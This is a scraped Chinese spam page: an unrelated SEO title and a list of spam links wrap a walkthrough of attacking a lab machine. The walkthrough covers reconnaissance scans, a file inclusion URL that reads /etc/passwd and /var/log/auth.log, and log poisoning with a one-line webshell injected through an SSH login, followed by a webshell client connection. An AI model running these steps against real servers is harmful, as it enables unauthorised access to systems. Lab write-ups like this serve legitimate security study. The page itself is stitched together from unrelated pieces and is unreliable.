当前位置: 首页 > news >正文

深圳产品型网站建设站内营销推广途径

news 2026/4/8 4:42:06
深圳产品型网站建设,站内营销推广途径,成都网站建设金网科技,中国公司网点击开启靶机 去kali终端输入 arp-scan -l //扫描靶机IP 扫出靶机IP192.168.131.171 第一步:信息收集 端口扫描 nmap -p- 192.168.131.171 敏感目录扫描 dirb http://192.168.131.171 总结: IP:192.168.168.131 开放端口:2…

点击开启靶机

去kali终端输入

arp-scan -l  //扫描靶机IP

扫出靶机IP192.168.131.171

第一步:信息收集

端口扫描

nmap -p- 192.168.131.171

敏感目录扫描

dirb http://192.168.131.171

总结:

IP:192.168.168.131
开放端口:21、80、2211、8888
敏感目录:http://192.168.168.131/antibot_image/

第二步:漏洞利用

登陆网站

访问敏感目录

点击进入查看

发现info.php 进入

查看源代码

发现include 存在文件包含漏洞

我们尝试用该漏洞查看passwd文件,发现可以成功

http://192.168.131.171/antibot_image/antibots/info.php?image=/etc/passwd

看到了有一个用户Tomato的uid为1000,我们尝试查看一下其他文件。
查看日志文件,日志文件记录了其他用户的一些操作,其中或许留有线索

http://192.168.131.171/antibot_image/antibots/info.php?image=/var/log/auth.log

发现日志,尝试写入一句话木马

使用MobaXterm工具ssh连接

随机输入密码,返回查看日志

为空 已经输入进去

打开蚁剑工具进行连接

http://www.hkea.cn/news/744611/

相关文章:

  • jsp做网站案例steam交易链接在哪里看
  • 做网站需要招聘内容范本信息流广告
  • 如何建公众号外贸网站建设优化
  • 怎么把网站横幅做很大东莞营销推广公司
  • 网站运营与管理实训报告松松软文平台
  • 奉化云优化seo手机网站排名优化软件
  • h5响应式集团网站推荐电商平台有哪些?
  • 企业所得税税率三个档次关键词优化快排
  • 长宁区网站建设b2b免费发布平台
  • php 个人网站网站安全检测工具
  • 做的网站很卡是什么原因seochan是什么意思
  • 怎么做盗版视频网站吗百度权重1
  • 政府网站 建设 计划品牌推广策划方案案例
  • 临沂网站建设那家好小米市场营销案例分析
  • 德化网站建设企业中层管理人员培训课程
  • 网站怎么通过流量赚钱爱站网能不能挖掘关键词
  • 网站建设课后感营销型网站有哪些平台
  • 哪个网站做生鲜配送厦门seo外包公司
  • 水电行业公司设计logo重庆seo排名扣费
  • 可信赖的南昌网站制作站长工具网站
  • 济南建站公司电话成都关键词自然排名
  • 门户网站开发公司推广网页
  • 如何做网站认证实时军事热点
  • 上海的网站建设公司哪家好企业网站建设
  • 专业b2c电商网站制作网站推广要点
  • 现在的网站用什么程序做百度云官网登录入口
  • vs做网站怎样加数据库新闻小学生摘抄
  • 广州做网站mxszpt小说排行榜
  • 有什么网站是python做的网站营销策划公司
  • 长春有什么好的网站制作公司链接购买